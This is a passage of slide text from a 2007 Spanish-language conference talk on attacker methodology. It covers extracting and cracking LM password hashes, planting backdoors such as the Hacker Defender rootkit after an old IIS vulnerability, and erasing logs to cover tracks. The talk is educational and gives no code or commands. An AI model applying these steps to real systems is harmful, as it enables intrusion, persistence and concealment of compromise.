![Page 73: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/73.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 74: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/74.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 75: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/75.jpg)
MÉTODO GENÉRICO DE ATAQUE
Pilfering
(Ratería, Vileza, Bajeza, Ruindad)
La Praxis del Cracker – MTS – Margarita 2007
![Page 76: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/76.jpg)
MÉTODO GENÉRICO DE ATAQUE
• El Cracker extrae entonces las cuentas y los LM Hashes de las contraseñas. Posteriormente puede usar un programa tipo “Crackeador”
La Praxis del Cracker – MTS – Margarita 2007
![Page 77: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/77.jpg)
MÉTODO GENÉRICO DE ATAQUE
• Esta es una posible salida de lo que se obtendría. De esta forma el Cracker puede ahora suplantar a los usuarios autorizados en el sistema
La Praxis del Cracker – MTS – Margarita 2007
![Page 78: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/78.jpg)
MÉTODO GENÉRICO DE ATAQUE
Creating Backdoors
(Crear las Puertas Traseras)
La Praxis del Cracker – MTS – Margarita 2007
![Page 79: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/79.jpg)
MÉTODO GENÉRICO DE ATAQUE
• Ahora el Cracker puede “sembrar” calquier programa tipo “backdoor” que le permita volver a entrar en el sistema víctima y ganar privilegios, incluso si la vulnerabilidad “Decode” del IIS 4.0 y 5.0 es subsanada
La Praxis del Cracker – MTS – Margarita 2007
![Page 80: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/80.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 81: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/81.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 82: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/82.jpg)
MÉTODO GENÉRICO DE ATAQUE
• Rootkit HD 1.0 – versión de evaluación -
- Opera en sistemas WNT/W2K/WXP
- Parecido a un “troyano”, pero con características adicionales para ocultar su existencia y ejecución. Intercepta las llamadas a la API Win32 de Windows y altera la respuesta
- Genera un nuevo servicio “Hacker Defender 100” sobre cualquier puerto del sistema víctima y se comunica con el atacante a través de un programa cliente “bdclient”
- Puede adaptar su funcionamiento para disponer de distintas formas de operación
- Provee facilidad de contraseña para controlar su ejecución
La Praxis del Cracker – MTS – Margarita 2007
![Page 83: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/83.jpg)
MÉTODO GENÉRICO DE ATAQUE
Covering Tracks
(Cubrir las Huellas)
La Praxis del Cracker – MTS – Margarita 2007
![Page 84: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/84.jpg)
MÉTODO GENÉRICO DE ATAQUE
• Finalmente, si se han transferido programas para alterar los “logs”, el Cracker puede borrar fácilmente toda “huella” de su actividad. En caso contrario puede hacerlo manualmente
La Praxis del Cracker – MTS – Margarita 2007
![Page 85: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/85.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 86: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/86.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 87: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/87.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 88: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/88.jpg)
MÉTODO GENÉRICO DE ATAQUE
La Praxis del Cracker – MTS – Margarita 2007
![Page 89: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/89.jpg)
MÉTODO GENÉRICO DE ATAQUE
• Un administrador medianamente experimentado sospechará de inmediato si observa una salida como la anterior y la de abajo
La Praxis del Cracker – MTS – Margarita 2007
![Page 90: La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.](https://reader033.fdocuments.es/reader033/viewer/2022061303/54f5cd584a79595c208b4595/html5/thumbnails/90.jpg)
_________________________________CIERRE
“Conoced al enemigo y conoceos vos mismos; en cien batallas nunca correréis ningún peligro”.
Sun Tzu
El Arte de la Guerra
La Praxis del Cracker – MTS – Margarita 2007